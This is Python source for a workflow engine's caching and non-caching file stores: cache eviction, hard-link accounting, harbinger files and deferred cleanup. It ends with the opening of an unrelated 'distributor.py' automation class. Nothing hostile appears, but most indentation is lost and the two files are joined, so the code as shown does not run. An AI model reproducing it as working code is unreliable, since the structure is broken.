it need to be linked to the required location, or copied. If it is copied, can the file
still be retained in cache?
:param str localFilePath: Path to the Source file
:param jobStoreFileID: jobStoreID for the file
:param str callingFunc: Who called this function, 'write' or 'read'
:param bool mutable: See modifiable in readGlobalFile
"""
assert callingFunc in ('read', 'write')
with self.cacheLock() as lockFileHandle:
cachedFile = self.encodedFileID(jobStoreFileID)
# The file to be cached MUST originate in the environment of the TOIL temp directory
if (os.stat(self.localCacheDir).st_dev !=
os.stat(os.path.dirname(localFilePath)).st_dev):
raise InvalidSourceCacheError('Attempting to cache a file across file systems '
'cachedir = %s, file = %s.' % (self.localCacheDir,
localFilePath))
if not localFilePath.startswith(self.localTempDir):
raise InvalidSourceCacheError('Attempting a cache operation on a non-local file '
'%s.' % localFilePath)
if callingFunc == 'read' and mutable:
shutil.copyfile(cachedFile, localFilePath)
fileSize = os.stat(cachedFile).st_size
cacheInfo = self._CacheState._load(self.cacheStateFile)
cacheInfo.cached += fileSize if cacheInfo.nlink != 2 else 0
if not cacheInfo.isBalanced():
os.remove(cachedFile)
cacheInfo.cached -= fileSize if cacheInfo.nlink != 2 else 0
                    logger.debug('Could not both download %s as mutable and add it to the '
                                 'cache. Only the mutable copy was retained.'
                                 % os.path.basename(localFilePath))
else:
logger.debug('CACHE: Added file with ID \'%s\' to the cache.' %
jobStoreFileID)
jobState = self._JobState(cacheInfo.jobState[self.jobID])
jobState.addToJobSpecFiles(jobStoreFileID, localFilePath, -1, False)
cacheInfo.jobState[self.jobID] = jobState.__dict__
cacheInfo.write(self.cacheStateFile)
else:
# There are two possibilities, read and immutable, and write. both cases do
# almost the same thing except for the direction of the os.link hence we're
# writing them together.
if callingFunc == 'read': # and mutable is inherently False
src = cachedFile
dest = localFilePath
# To mirror behaviour of shutil.copyfile
if os.path.exists(dest):
os.remove(dest)
else: # write
src = localFilePath
dest = cachedFile
try:
os.link(src, dest)
except OSError as err:
if err.errno != errno.EEXIST:
raise
# If we get the EEXIST error, it can only be from write since in read we are
# explicitly deleting the file. This shouldn't happen with the .partial
# logic hence we raise a cache error.
raise CacheError('Attempting to recache a file %s.' % src)
else:
# Chmod the cached file. Cached files can never be modified.
os.chmod(cachedFile, stat.S_IRUSR | stat.S_IRGRP | stat.S_IROTH)
# Return the filesize of cachedFile to the job and increase the cached size
# The values passed here don't matter since rFS looks at the file only for
# the stat
self.returnFileSize(jobStoreFileID, localFilePath, lockFileHandle,
fileAlreadyCached=False)
if callingFunc == 'read':
logger.debug('CACHE: Read file with ID \'%s\' from the cache.' %
jobStoreFileID)
else:
logger.debug('CACHE: Added file with ID \'%s\' to the cache.' %
jobStoreFileID)
def returnFileSize(self, fileStoreID, cachedFileSource, lockFileHandle,
fileAlreadyCached=False):
"""
Returns the fileSize of the file described by fileStoreID to the job requirements pool
if the file was recently added to, or read from cache (A job that reads n bytes from
        cache doesn't really use those n bytes as a part of its job disk since cache is already
accounting for that disk space).
        :param fileStoreID: fileStore ID of the file being added to cache
:param str cachedFileSource: File being added to cache
:param file lockFileHandle: Open file handle to the cache lock file
:param bool fileAlreadyCached: A flag to indicate whether the file was already cached or
not. If it was, then it means that you don't need to add the filesize to cache again.
"""
fileSize = os.stat(cachedFileSource).st_size
cacheInfo = self._CacheState._load(self.cacheStateFile)
# If the file isn't cached, add the size of the file to the cache pool. However, if the
# nlink threshold is not 1 - i.e. it is 2 (it can only be 1 or 2), then don't do this
# since the size of the file is accounted for by the file store copy.
if not fileAlreadyCached and self.nlinkThreshold == 1:
cacheInfo.cached += fileSize
cacheInfo.sigmaJob -= fileSize
if not cacheInfo.isBalanced():
self.logToMaster('CACHE: The cache was not balanced on returning file size',
logging.WARN)
# Add the info to the job specific cache info
jobState = self._JobState(cacheInfo.jobState[self.jobID])
jobState.addToJobSpecFiles(fileStoreID, cachedFileSource, fileSize, True)
cacheInfo.jobState[self.jobID] = jobState.__dict__
cacheInfo.write(self.cacheStateFile)
@staticmethod
def _isHidden(filePath):
"""
This is a function that checks whether filePath is hidden
:param str filePath: Path to the file under consideration
:return: A boolean indicating whether the file is hidden or not.
:rtype: bool
"""
assert isinstance(filePath, (str, bytes))
        # I can safely assume I will never see an empty string because this is always called on
        # the results of an os.listdir()
return filePath[0] in ('.', '_')
def cleanCache(self, newJobReqs):
"""
        Cleanup all files in the cache directory to ensure that at least newJobReqs bytes are
        available for use.
        :param float newJobReqs: the disk space (in bytes) requested by the new job.
"""
with self._CacheState.open(self) as cacheInfo:
# Add the new job's disk requirements to the sigmaJobDisk variable
cacheInfo.sigmaJob += newJobReqs
# Initialize the job state here. we use a partial in the jobSpecificFiles call so
# that this entire thing is pickleable. Based on answer by user Nathaniel Gentile at
# http://stackoverflow.com/questions/2600790
assert self.jobID not in cacheInfo.jobState
cacheInfo.jobState[self.jobID] = {
'jobName': self.jobName,
'jobReqs': newJobReqs,
'jobDir': self.localTempDir,
'jobSpecificFiles': defaultdict(partial(defaultdict,int)),
'filesToFSIDs': defaultdict(set),
'pid': os.getpid(),
'deferredFunctions': []}
# If the caching equation is balanced, do nothing.
if cacheInfo.isBalanced():
return None
            # List of deletable cached files. A deletable cache file is one
            # that is not in use by any other worker (identified by the number of hard links
            # to the file)
allCacheFiles = [os.path.join(self.localCacheDir, x)
for x in os.listdir(self.localCacheDir)
if not self._isHidden(x)]
allCacheFiles = [(path, os.stat(path)) for path in allCacheFiles]
# TODO mtime vs ctime
deletableCacheFiles = {(path, inode.st_mtime, inode.st_size)
for path, inode in allCacheFiles
if inode.st_nlink == self.nlinkThreshold}
            # Sort in descending order of mtime so the first items to be popped from the list
            # are the least recently modified (i.e. the oldest).
deletableCacheFiles = sorted(deletableCacheFiles, key=lambda x: (-x[1], -x[2]))
logger.debug('CACHE: Need %s bytes for new job. Detecting an estimated %s (out of a '
'total %s) bytes available for running the new job. The size of the cache '
'is %s bytes.', newJobReqs,
(cacheInfo.total - (cacheInfo.cached + cacheInfo.sigmaJob - newJobReqs)),
cacheInfo.total, cacheInfo.cached)
logger.debug('CACHE: Evicting files to make room for the new job.')
# Now do the actual file removal
totalEvicted = 0
while not cacheInfo.isBalanced() and len(deletableCacheFiles) > 0:
cachedFile, fileCreateTime, cachedFileSize = deletableCacheFiles.pop()
os.remove(cachedFile)
cacheInfo.cached -= cachedFileSize if self.nlinkThreshold != 2 else 0
totalEvicted += cachedFileSize
assert cacheInfo.cached >= 0
logger.debug('CACHE: Evicted file with ID \'%s\' (%s bytes)' %
(self.decodedFileID(cachedFile), cachedFileSize))
logger.debug('CACHE: Evicted a total of %s bytes. Available space is now %s bytes.',
totalEvicted,
(cacheInfo.total - (cacheInfo.cached + cacheInfo.sigmaJob - newJobReqs)))
if not cacheInfo.isBalanced():
raise CacheUnbalancedError()
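    # Eviction policy in brief: only files whose hard-link count equals the node's
    # nlinkThreshold (i.e. not currently linked into any job's temp dir) are candidates, and
    # they are removed oldest-mtime-first until the caching equation balances or the
    # candidates run out, at which point CacheUnbalancedError is raised.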
def removeSingleCachedFile(self, fileStoreID):
"""
Removes a single file described by the fileStoreID from the cache forcibly.
"""
with self._CacheState.open(self) as cacheInfo:
cachedFile = self.encodedFileID(fileStoreID)
cachedFileStats = os.stat(cachedFile)
# We know the file exists because this function was called in the if block. So we
# have to ensure nothing has changed since then.
assert cachedFileStats.st_nlink == self.nlinkThreshold, 'Attempting to delete ' + \
'a global file that is in use by another job.'
# Remove the file size from the cached file size if the jobstore is not fileJobStore
# and then delete the file
os.remove(cachedFile)
if self.nlinkThreshold != 2:
cacheInfo.cached -= cachedFileStats.st_size
if not cacheInfo.isBalanced():
self.logToMaster('CACHE: The cache was not balanced on removing single file',
logging.WARN)
self.logToMaster('CACHE: Successfully removed file with ID \'%s\'.' % fileStoreID)
return None
def setNlinkThreshold(self):
# FIXME Can't do this at the top because of loopy (circular) import errors
from toil.jobStores.fileJobStore import FileJobStore
if (isinstance(self.jobStore, FileJobStore) and
os.stat(os.path.dirname(self.localCacheDir)).st_dev == os.stat(
self.jobStore.jobStoreDir).st_dev):
self.nlinkThreshold = 2
else:
self.nlinkThreshold = 1
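    # Example of the resulting threshold: with a FileJobStore at /data/jobstore and the worker
    # directory on the same /data filesystem, a cached file is also hard-linked from the job
    # store, so an otherwise-unused cached file has st_nlink == 2; with any other job store
    # (or a different device) the threshold is 1.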
def _accountForNlinkEquals2(self, localFilePath):
"""
This is a utility function that accounts for the fact that if nlinkThreshold == 2, the
size of the file is accounted for by the file store copy of the file and thus the file
size shouldn't be added to the cached file sizes.
:param str localFilePath: Path to the local file that was linked to the file store copy.
"""
fileStats = os.stat(localFilePath)
assert fileStats.st_nlink >= self.nlinkThreshold
with self._CacheState.open(self) as cacheInfo:
cacheInfo.sigmaJob -= fileStats.st_size
jobState = self._JobState(cacheInfo.jobState[self.jobID])
jobState.updateJobReqs(fileStats.st_size, 'remove')
def returnJobReqs(self, jobReqs):
"""
This function returns the effective job requirements back to the pool after the job
completes. It also deletes the local copies of files with the cache lock held.
:param float jobReqs: Original size requirement of the job
"""
# Since we are only reading this job's specific values from the state file, we don't
# need a lock
jobState = self._JobState(self._CacheState._load(self.cacheStateFile
).jobState[self.jobID])
for x in list(jobState.jobSpecificFiles.keys()):
self.deleteLocalFile(x)
with self._CacheState.open(self) as cacheInfo:
cacheInfo.sigmaJob -= jobReqs
# assert cacheInfo.isBalanced() # commenting this out for now. God speed
class _CacheState(FileStore._StateFile):
"""
        Utility class to read and write the cache state file. Also for checking whether the
        caching equation is balanced or not. It extends the _StateFile class to add other
        cache related functions.
"""
@classmethod
@contextmanager
def open(cls, outer=None):
"""
This is a context manager that opens the cache state file and reads it into an object
that is returned to the user in the yield
"""
assert outer is not None
with outer.cacheLock():
cacheInfo = cls._load(outer.cacheStateFile)
yield cacheInfo
cacheInfo.write(outer.cacheStateFile)
def isBalanced(self):
"""
Checks for the inequality of the caching equation, i.e.
cachedSpace + sigmaJobDisk <= totalFreeSpace
Essentially, the sum of all cached file + disk requirements of all running jobs
should always be less than the available space on the system
:return: Boolean for equation is balanced (T) or not (F)
:rtype: bool
"""
return self.cached + self.sigmaJob <= self.total
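        # Worked example with hypothetical numbers: if total = 100 GiB of free space,
        # cached = 30 GiB of cached files and sigmaJob = 60 GiB of summed job disk requests,
        # then 30 + 60 <= 100 and the equation is balanced; admitting a new 20 GiB job would
        # make it 30 + 80 > 100, and cleanCache() would start evicting.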
def purgeRequired(self, jobReqs):
"""
Similar to isBalanced, however it looks at the actual state of the system and
decides whether an eviction is required.
:return: Is a purge required(T) or no(F)
:rtype: bool
"""
return not self.isBalanced()
# totalStats = os.statvfs(self.cacheDir)
# totalFree = totalStats.f_bavail * totalStats.f_frsize
# return totalFree < jobReqs
# Methods related to the deferred function logic
@classmethod
def findAndHandleDeadJobs(cls, nodeInfo, batchSystemShutdown=False):
"""
:param toil.fileStore.CachingFileStore._CacheState nodeInfo: The state of the node cache as
a _CacheState object
"""
            # A list of tuples of (hashed job id, pid of the process that ran the job)
registeredJobs = [(jid, state['pid']) for jid, state in list(nodeInfo.jobState.items())]
for jobID, jobPID in registeredJobs:
if not cls._pidExists(jobPID):
jobState = CachingFileStore._JobState(nodeInfo.jobState[jobID])
logger.warning('Detected that job (%s) prematurely terminated. Fixing the state '
'of the cache.', jobState.jobName)
if not batchSystemShutdown:
logger.debug("Returning dead job's used disk to cache.")
# Delete the old work directory if it still exists, to remove unwanted nlinks.
                    # Do this only during the life of the program and don't do it during the
                    # batch system cleanup. Leave that to the batch system cleanup code.
if os.path.exists(jobState.jobDir):
shutil.rmtree(jobState.jobDir)
nodeInfo.sigmaJob -= jobState.jobReqs
logger.debug('Running user-defined deferred functions.')
cls._runDeferredFunctions(jobState.deferredFunctions)
# Remove job from the cache state file
nodeInfo.jobState.pop(jobID)
def _registerDeferredFunction(self, deferredFunction):
with self._CacheState.open(self) as cacheInfo:
cacheInfo.jobState[self.jobID]['deferredFunctions'].append(deferredFunction)
logger.debug('Registered "%s" with job "%s".', deferredFunction, self.jobName)
class _JobState(object):
"""
        This is a utility class to handle the state of a job in terms of its current disk
requirements, working directory, and job specific files.
"""
def __init__(self, dictObj):
assert isinstance(dictObj, dict)
self.__dict__.update(dictObj)
@classmethod
def updateJobSpecificFiles(cls, outer, jobStoreFileID, filePath, fileSize, cached):
"""
            This method will update the job specific files in the job state object. It deals with
opening a cache lock file, etc.
:param toil.fileStore.CachingFileStore outer: An instance of CachingFileStore
:param str jobStoreFileID: job store Identifier for the file
:param str filePath: The path to the file
:param float fileSize: The size of the file (may be deprecated soon)
:param bool cached: T : F : None :: cached : not cached : mutably read
"""
with outer._CacheState.open(outer) as cacheInfo:
jobState = cls(cacheInfo.jobState[outer.jobID])
jobState.addToJobSpecFiles(jobStoreFileID, filePath, fileSize, cached)
cacheInfo.jobState[outer.jobID] = jobState.__dict__
def addToJobSpecFiles(self, jobStoreFileID, filePath, fileSize, cached):
"""
            This is the method that actually performs the update.
:param jobStoreFileID: job store Identifier for the file
:param filePath: The path to the file
:param fileSize: The size of the file (may be deprecated soon)
:param cached: T : F : None :: cached : not cached : mutably read
"""
# If there is no entry for the jsfID, make one. self.jobSpecificFiles is a default
# dict of default dicts and the absence of a key will return an empty dict
# (equivalent to a None for the if)
if not self.jobSpecificFiles[jobStoreFileID]:
self.jobSpecificFiles[jobStoreFileID][filePath] = fileSize
else:
# If there's no entry for the filepath, create one
if not self.jobSpecificFiles[jobStoreFileID][filePath]:
self.jobSpecificFiles[jobStoreFileID][filePath] = fileSize
# This should never happen
else:
raise RuntimeError()
# Now add the file to the reverse mapper. This will speed up cleanup and local file
# deletion.
self.filesToFSIDs[filePath].add(jobStoreFileID)
if cached:
self.updateJobReqs(fileSize, 'add')
def updateJobReqs(self, fileSize, actions):
"""
This method will update the current state of the disk required by the job after the
most recent cache operation.
:param fileSize: Size of the last file added/removed from the cache
:param actions: 'add' or 'remove'
"""
assert actions in ('add', 'remove')
multiplier = 1 if actions == 'add' else -1
# If the file was added to the cache, the value is subtracted from the requirements,
            # and it is added if the file was removed from the cache.
self.jobReqs -= (fileSize * multiplier)
def isPopulated(self):
return self.__dict__ != {}
class HarbingerFile(object):
"""
        Represents the placeholder file that heralds the arrival of a local copy of a file in
        the job store.
"""
def __init__(self, fileStore, fileStoreID=None, cachedFileName=None):
"""
Returns the harbinger file name for a cached file, or for a job store ID
:param class fileStore: The 'self' object of the fileStore class
:param str fileStoreID: The file store ID for an input file
:param str cachedFileName: The cache file name corresponding to a given file
"""
# We need either a file store ID, or a cached file name, but not both (XOR).
assert (fileStoreID is None) != (cachedFileName is None)
if fileStoreID is not None:
self.fileStoreID = fileStoreID
cachedFileName = fileStore.encodedFileID(fileStoreID)
else:
self.fileStoreID = fileStore.decodedFileID(cachedFileName)
self.fileStore = fileStore
self.harbingerFileName = '/.'.join(os.path.split(cachedFileName)) + '.harbinger'
def write(self):
self.fileStore.logToMaster('CACHE: Creating a harbinger file for (%s). '
% self.fileStoreID, logging.DEBUG)
with open(self.harbingerFileName + '.tmp', 'w') as harbingerFile:
harbingerFile.write(str(os.getpid()))
# Make this File read only to prevent overwrites
os.chmod(self.harbingerFileName + '.tmp', 0o444)
os.rename(self.harbingerFileName + '.tmp', self.harbingerFileName)
def waitOnDownload(self, lockFileHandle):
"""
This method is called when a readGlobalFile process is waiting on another process to
write a file to the cache.
:param lockFileHandle: The open handle to the cache lock file
"""
while self.exists():
logger.debug('CACHE: Waiting for another worker to download file with ID %s.'
% self.fileStoreID)
# Ensure that the process downloading the file is still alive. The PID will
# be in the harbinger file.
pid = self.read()
if FileStore._pidExists(pid):
# Release the file lock and then wait for a bit before repeating.
flock(lockFileHandle, LOCK_UN)
time.sleep(20)
# Grab the file lock before repeating.
flock(lockFileHandle, LOCK_EX)
else:
# The process that was supposed to download the file has died so we need
# to remove the harbinger.
self._delete()
def read(self):
return int(open(self.harbingerFileName).read())
def exists(self):
return os.path.exists(self.harbingerFileName)
def delete(self):
"""
Acquires the cache lock then attempts to delete the harbinger file.
"""
with self.fileStore.cacheLock():
self._delete()
def _delete(self):
"""
This function assumes you already have the cache lock!
"""
assert self.exists()
self.fileStore.logToMaster('CACHE: Deleting the harbinger file for (%s)' %
self.fileStoreID, logging.DEBUG)
os.remove(self.harbingerFileName)
# Functions related to async updates
def asyncWrite(self):
"""
A function to write files asynchronously to the job store such that subsequent jobs are
not delayed by a long write operation.
"""
try:
while True:
try:
# Block for up to two seconds waiting for a file
args = self.queue.get(timeout=2)
except Empty:
# Check if termination event is signaled
# (set in the event of an exception in the worker)
if self._terminateEvent.isSet():
raise RuntimeError("The termination flag is set, exiting")
continue
# Normal termination condition is getting None from queue
if args is None:
break
inputFileHandle, jobStoreFileID = args
cachedFileName = self.encodedFileID(jobStoreFileID)
# Ensure that the harbinger exists in the cache directory and that the PID
# matches that of this writing thread.
# If asyncWrite is ported to subprocesses instead of threads in the future,
# insert logic here to securely overwrite the harbinger file.
harbingerFile = self.HarbingerFile(self, cachedFileName=cachedFileName)
assert harbingerFile.exists()
assert harbingerFile.read() == int(os.getpid())
# We pass in a fileHandle, rather than the file-name, in case
# the file itself is deleted. The fileHandle itself should persist
# while we maintain the open file handle
with self.jobStore.updateFileStream(jobStoreFileID) as outputFileHandle:
shutil.copyfileobj(inputFileHandle, outputFileHandle)
inputFileHandle.close()
# Remove the file from the lock files
with self._pendingFileWritesLock:
self._pendingFileWrites.remove(jobStoreFileID)
# Remove the harbinger file
harbingerFile.delete()
except:
self._terminateEvent.set()
raise
def _updateJobWhenDone(self):
"""
        Asynchronously update the status of the job on the disk, first waiting
        until the writing threads have finished and the input blockFn has stopped
        blocking.
"""
def asyncUpdate():
try:
# Wait till all file writes have completed
for i in range(len(self.workers)):
self.queue.put(None)
for thread in self.workers:
thread.join()
# Wait till input block-fn returns - in the event of an exception
# this will eventually terminate
self.inputBlockFn()
# Check the terminate event, if set we can not guarantee
# that the workers ended correctly, therefore we exit without
# completing the update
if self._terminateEvent.isSet():
raise RuntimeError("The termination flag is set, exiting before update")
# Indicate any files that should be deleted once the update of
# the job wrapper is completed.
self.jobGraph.filesToDelete = list(self.filesToDelete)
# Complete the job
self.jobStore.update(self.jobGraph)
# Delete any remnant jobs
list(map(self.jobStore.delete, self.jobsToDelete))
# Delete any remnant files
list(map(self.jobStore.deleteFile, self.filesToDelete))
# Remove the files to delete list, having successfully removed the files
if len(self.filesToDelete) > 0:
self.jobGraph.filesToDelete = []
                    # Update again, now that the files-to-delete list has been emptied
self.jobStore.update(self.jobGraph)
except:
self._terminateEvent.set()
raise
finally:
# Indicate that _blockFn can return
# This code will always run
self.updateSemaphore.release()
# The update semaphore is held while the job is written to the job store
try:
self.updateSemaphore.acquire()
t = Thread(target=asyncUpdate)
t.start()
except:
# This is to ensure that the semaphore is released in a crash to stop a deadlock
# scenario
self.updateSemaphore.release()
raise
def _blockFn(self):
self.updateSemaphore.acquire()
self.updateSemaphore.release() # Release so that the block function can be recalled
# This works, because once acquired the semaphore will not be acquired
# by _updateJobWhenDone again.
return
@classmethod
def shutdown(cls, dir_):
"""
:param dir_: The directory that will contain the cache state file.
"""
cacheInfo = cls._CacheState._load(os.path.join(dir_, '_cacheState'))
cls.findAndHandleDeadJobs(cacheInfo, batchSystemShutdown=True)
shutil.rmtree(dir_)
def __del__(self):
"""
Cleanup function that is run when destroying the class instance that ensures that all the
file writing threads exit.
"""
self.updateSemaphore.acquire()
for i in range(len(self.workers)):
self.queue.put(None)
for thread in self.workers:
thread.join()
self.updateSemaphore.release()
class NonCachingFileStore(FileStore):
def __init__(self, jobStore, jobGraph, localTempDir, inputBlockFn):
self.jobStore = jobStore
self.jobGraph = jobGraph
self.jobName = str(self.jobGraph)
self.localTempDir = os.path.abspath(localTempDir)
self.inputBlockFn = inputBlockFn
self.jobsToDelete = set()
self.loggingMessages = []
self.filesToDelete = set()
super(NonCachingFileStore, self).__init__(jobStore, jobGraph, localTempDir, inputBlockFn)
# This will be defined in the `open` method.
self.jobStateFile = None
self.localFileMap = defaultdict(list)
@contextmanager
def open(self, job):
jobReqs = job.disk
startingDir = os.getcwd()
self.localTempDir = makePublicDir(os.path.join(self.localTempDir, str(uuid.uuid4())))
self.findAndHandleDeadJobs(self.workFlowDir)
self.jobStateFile = self._createJobStateFile()
freeSpace, diskSize = getFileSystemSize(self.localTempDir)
if freeSpace <= 0.1 * diskSize:
logger.warning('Starting job %s with less than 10%% of disk space remaining.',
self.jobName)
try:
os.chdir(self.localTempDir)
yield
finally:
diskUsed = getDirSizeRecursively(self.localTempDir)
logString = ("Job {jobName} used {percent:.2f}% ({humanDisk}B [{disk}B] used, "
"{humanRequestedDisk}B [{requestedDisk}B] requested) at the end of "
"its run.".format(jobName=self.jobName,
percent=(float(diskUsed) / jobReqs * 100 if
jobReqs > 0 else 0.0),
humanDisk=bytes2human(diskUsed),
disk=diskUsed,
humanRequestedDisk=bytes2human(jobReqs),
requestedDisk=jobReqs))
self.logToMaster(logString, level=logging.DEBUG)
if diskUsed > jobReqs:
self.logToMaster("Job used more disk than requested. Consider modifying the user "
"script to avoid the chance of failure due to incorrectly "
"requested resources. " + logString, level=logging.WARNING)
os.chdir(startingDir)
jobState = self._readJobState(self.jobStateFile)
deferredFunctions = jobState['deferredFunctions']
failures = self._runDeferredFunctions(deferredFunctions)
for failure in failures:
self.logToMaster('Deferred function "%s" failed.' % failure, logging.WARN)
# Finally delete the job from the worker
os.remove(self.jobStateFile)
def writeGlobalFile(self, localFileName, cleanup=False):
absLocalFileName = self._resolveAbsoluteLocalPath(localFileName)
cleanupID = None if not cleanup else self.jobGraph.jobStoreID
fileStoreID = self.jobStore.writeFile(absLocalFileName, cleanupID)
self.localFileMap[fileStoreID].append(absLocalFileName)
return FileID.forPath(fileStoreID, absLocalFileName)
def readGlobalFile(self, fileStoreID, userPath=None, cache=True, mutable=False, symlink=False):
if userPath is not None:
localFilePath = self._resolveAbsoluteLocalPath(userPath)
if os.path.exists(localFilePath):
raise RuntimeError(' File %s ' % localFilePath + ' exists. Cannot Overwrite.')
else:
localFilePath = self.getLocalTempFileName()
self.jobStore.readFile(fileStoreID, localFilePath, symlink=symlink)
self.localFileMap[fileStoreID].append(localFilePath)
return localFilePath
@contextmanager
def readGlobalFileStream(self, fileStoreID):
with self.jobStore.readFileStream(fileStoreID) as f:
yield f
def exportFile(self, jobStoreFileID, dstUrl):
self.jobStore.exportFile(jobStoreFileID, dstUrl)
def deleteLocalFile(self, fileStoreID):
try:
localFilePaths = self.localFileMap.pop(fileStoreID)
except KeyError:
raise OSError(errno.ENOENT, "Attempting to delete a non-local file")
else:
for localFilePath in localFilePaths:
os.remove(localFilePath)
def deleteGlobalFile(self, fileStoreID):
try:
self.deleteLocalFile(fileStoreID)
except OSError as e:
if e.errno == errno.ENOENT:
# the file does not exist locally, so no local deletion necessary
pass
else:
raise
self.filesToDelete.add(fileStoreID)
def _blockFn(self):
# there is no asynchronicity in this file store so no need to block at all
return True
def _updateJobWhenDone(self):
try:
# Indicate any files that should be deleted once the update of
# the job wrapper is completed.
self.jobGraph.filesToDelete = list(self.filesToDelete)
# Complete the job
self.jobStore.update(self.jobGraph)
# Delete any remnant jobs
list(map(self.jobStore.delete, self.jobsToDelete))
# Delete any remnant files
list(map(self.jobStore.deleteFile, self.filesToDelete))
# Remove the files to delete list, having successfully removed the files
if len(self.filesToDelete) > 0:
self.jobGraph.filesToDelete = []
                # Update again, now that the files-to-delete list has been emptied
self.jobStore.update(self.jobGraph)
except:
self._terminateEvent.set()
raise
def __del__(self):
"""
Cleanup function that is run when destroying the class instance. Nothing to do since there
are no async write events.
"""
pass
# Functions related to the deferred function logic
@classmethod
def findAndHandleDeadJobs(cls, nodeInfo, batchSystemShutdown=False):
"""
Look at the state of all jobs registered in the individual job state files, and handle them
(clean up the disk, and run any registered defer functions)
:param str nodeInfo: The location of the workflow directory on the node.
:param bool batchSystemShutdown: Is the batch system in the process of shutting down?
:return:
"""
        # A list of tuples of (job name, pid of the process running the job, registered deferred functions)
for jobState in cls._getAllJobStates(nodeInfo):
if not cls._pidExists(jobState['jobPID']):
# using same logic to prevent races as CachingFileStore._setupCache
myPID = str(os.getpid())
cleanupFile = os.path.join(jobState['jobDir'], '.cleanup')
with open(os.path.join(jobState['jobDir'], '.' + myPID), 'w') as f:
f.write(myPID)
while True:
try:
os.rename(f.name, cleanupFile)
except OSError as err:
if err.errno == errno.ENOTEMPTY:
with open(cleanupFile, 'r') as f:
cleanupPID = f.read()
if cls._pidExists(int(cleanupPID)):
# Cleanup your own mess. It's only polite.
os.remove(f.name)
break
else:
os.remove(cleanupFile)
continue
else:
raise
else:
logger.warning('Detected that job (%s) prematurely terminated. Fixing the '
'state of the job on disk.', jobState['jobName'])
if not batchSystemShutdown:
logger.debug("Deleting the stale working directory.")
                    # Delete the old work directory if it still exists. Do this only during
                    # the life of the program and don't do it during the batch system
                    # cleanup. Leave that to the batch system cleanup code.
shutil.rmtree(jobState['jobDir'])
# Run any deferred functions associated with the job
logger.debug('Running user-defined deferred functions.')
cls._runDeferredFunctions(jobState['deferredFunctions'])
break
@staticmethod
def _getAllJobStates(workflowDir):
"""
Generator function that deserializes and yields the job state for every job on the node,
one at a time.
:param str workflowDir: The location of the workflow directory on the node.
:return: dict with keys (jobName, jobPID, jobDir, deferredFunctions)
:rtype: dict
"""
jobStateFiles = []
for root, dirs, files in os.walk(workflowDir):
for filename in files:
if filename == '.jobState':
jobStateFiles.append(os.path.join(root, filename))
for filename in jobStateFiles:
try:
yield NonCachingFileStore._readJobState(filename)
except IOError as e:
                if e.errno == errno.ENOENT:
                    # The job finished and deleted its jobState file after the jobState files were discovered
continue
else:
raise
@staticmethod
def _readJobState(jobStateFileName):
with open(jobStateFileName, 'rb') as fH:
state = dill.load(fH)
return state
def _registerDeferredFunction(self, deferredFunction):
with open(self.jobStateFile, 'rb') as fH:
jobState = dill.load(fH)
jobState['deferredFunctions'].append(deferredFunction)
with open(self.jobStateFile + '.tmp', 'wb') as fH:
dill.dump(jobState, fH)
os.rename(self.jobStateFile + '.tmp', self.jobStateFile)
logger.debug('Registered "%s" with job "%s".', deferredFunction, self.jobName)
def _createJobStateFile(self):
"""
Create the job state file for the current job and fill in the required
values.
:return: Path to the job state file
:rtype: str
"""
jobStateFile = os.path.join(self.localTempDir, '.jobState')
jobState = {'jobPID': os.getpid(),
'jobName': self.jobName,
'jobDir': self.localTempDir,
'deferredFunctions': []}
with open(jobStateFile + '.tmp', 'wb') as fH:
dill.dump(jobState, fH)
os.rename(jobStateFile + '.tmp', jobStateFile)
return jobStateFile
@classmethod
def shutdown(cls, dir_):
"""
:param dir_: The workflow directory that will contain all the individual worker directories.
"""
cls.findAndHandleDeadJobs(dir_, batchSystemShutdown=True)
class FileID(str):
"""
A class to wrap the job store file id returned by writeGlobalFile and any attributes we may want
to add to it.
"""
def __new__(cls, fileStoreID, *args):
return super(FileID, cls).__new__(cls, fileStoreID)
def __init__(self, fileStoreID, size):
# Don't pass an argument to parent class's __init__.
# In Python 3 we can have super(FileID, self) hand us object's __init__ which chokes on any arguments.
super(FileID, self).__init__()
self.size = size
@classmethod
def forPath(cls, fileStoreID, filePath):
return cls(fileStoreID, os.stat(filePath).st_size)
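# Usage sketch for FileID (hypothetical values): fid = FileID.forPath('files/abc', '/tmp/foo.txt')
# behaves as the plain string 'files/abc' everywhere a file store ID is expected, while also
# carrying fid.size, the on-disk size of /tmp/foo.txt at the time it was written.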
def shutdownFileStore(workflowDir, workflowID):
"""
Run the deferred functions from any prematurely terminated jobs still lingering on the system
and carry out any necessary filestore-specific cleanup.
This is a destructive operation and it is important to ensure that there are no other running
processes on the system that are modifying or using the file store for this workflow.
    This is intended to be the last call to the file store in a Toil run, called by the
batch system cleanup function upon batch system shutdown.
:param str workflowDir: The path to the cache directory
:param str workflowID: The workflow ID for this invocation of the workflow
"""
cacheDir = os.path.join(workflowDir, cacheDirName(workflowID))
if os.path.exists(cacheDir):
# The presence of the cacheDir suggests this was a cached run. We don't need the cache lock
# for any of this since this is the final cleanup of a job and there should be no other
# conflicting processes using the cache.
CachingFileStore.shutdown(cacheDir)
else:
        # The absence of the cacheDir suggests this was a non-cached run.
NonCachingFileStore.shutdown(workflowDir)
class CacheError(Exception):
"""
    Base class for errors raised by the caching logic
"""
def __init__(self, message):
super(CacheError, self).__init__(message)
class CacheUnbalancedError(CacheError):
"""
Raised if file store can't free enough space for caching
"""
    message = 'Unable to free enough space for caching. This error frequently arises due ' \
'to jobs using more disk than they have requested. Turn on debug logging to see ' \
'more information leading up to this error through cache usage logs.'
def __init__(self):
super(CacheUnbalancedError, self).__init__(self.message)
class IllegalDeletionCacheError(CacheError):
"""
    Error raised if Toil detects that the user deleted a cached file
"""
def __init__(self, deletedFile):
message = 'Cache tracked file (%s) deleted explicitly by user. Use deleteLocalFile to ' \
'delete such files.' % deletedFile
super(IllegalDeletionCacheError, self).__init__(message)
class InvalidSourceCacheError(CacheError):
"""
Error Raised if the user attempts to add a non-local file to cache
"""
def __init__(self, message):
super(InvalidSourceCacheError, self).__init__(message)
|
distributor.py
|
import json
import os
import re
import hashlib
import threading
from File.file import File
from Performance import recoder
from .operate import Operate
from .task import *
import GPUtil
import tensorflow as tf
import psutil
# noinspection PyTypeChecker
class Distributor:
def __init__(self, modelConfig, adb_path, labelsName, taskBufferPath="./config/taskBuffer.json"):
self.operate = Operate(modelConfig, adb_path, labelsName)
self.modelConfig = modelConfig
self.taskBufferPath = taskBufferPath
self.taskBuffer = TaskBuffer()
self.taskBuffer.load(self.taskBufferPath)
self.adb_path = adb_path
self.labelsName = labelsName
self.automation = None
self.continuousTask = None
self.mainThread: threading.Thread = None
self.taskEndCallback = None
self.taskType = "UNKNOWN"
